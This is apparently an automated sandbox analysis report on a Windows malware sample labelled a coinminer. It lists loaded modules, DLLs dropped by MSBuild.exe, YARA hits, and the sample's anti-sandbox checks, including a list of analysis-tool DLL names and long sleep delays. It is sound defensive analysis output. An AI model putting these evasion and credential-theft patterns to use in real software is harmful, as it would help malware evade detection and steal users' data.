                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic file information: File size 2952808 > 1048576
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x26de00
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.1.dr, freebl3[1].dll.1.dr
                        Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761810556.0000000005F50000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761810556.0000000005F50000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.1.dr, softokn3.dll.1.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2157065246.000000006CCEF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2148753612.0000000019948000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2139609144.00000000139D5000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.1.dr
                        Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
                        Source: Binary string: protobuf-net.pdb source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1761316124.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.0000000004209000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.1.dr, softokn3.dll.1.dr

                        Data Obfuscation

                        barindex
                        .NET source code contains potential unpacker
                        Source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5ef0000.16.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                        Source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5ef0000.16.raw.unpack, ListDecorator.cs.Net Code: Read
                        Source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5ef0000.16.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                        Source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5ef0000.16.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                        Source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5ef0000.16.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                        Yara detected Costura Assembly Loader
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4d48a78.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4cf8a58.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.5d30000.15.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.414d5b0.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe.4853278.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1760730113.0000000005D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.000000000414D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1752049015.0000000004853000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe PID: 6308, type: MEMORYSTR
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004185A0
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeStatic PE information: real checksum: 0x262ceb should be: 0x2da921
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_018DAC50 pushad ; retf 0_2_018DAC51
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_0309480A pushad ; ret 0_2_030948C9
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_03094810 pushad ; ret 0_2_030948C9
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeCode function: 0_2_057FBB0A push ds; iretd 0_2_057FBB11
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_0041A4E5 push ecx; ret 1_2_0041A4F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_6CAEB536 push ecx; ret 1_2_6CAEB549
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004185A0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe PID: 6308, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4076, type: MEMORYSTR
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: MSBuild.exeBinary or memory string: DIR_WATCH.DLL
                        Source: SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe, 00000000.00000002.1750736116.00000000030D1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL0SELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILURE
                        Source: MSBuild.exeBinary or memory string: SBIEDLL.DLL
                        Source: MSBuild.exeBinary or memory string: API_LOG.DLL
                        Source: MSBuild.exe, 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeMemory allocated: 18D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeMemory allocated: 30D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeMemory allocated: 50D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeAPI coverage: 5.6 %
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exe TID: 3804Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 1_2_00410370 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 004104A2h1_2_00410370
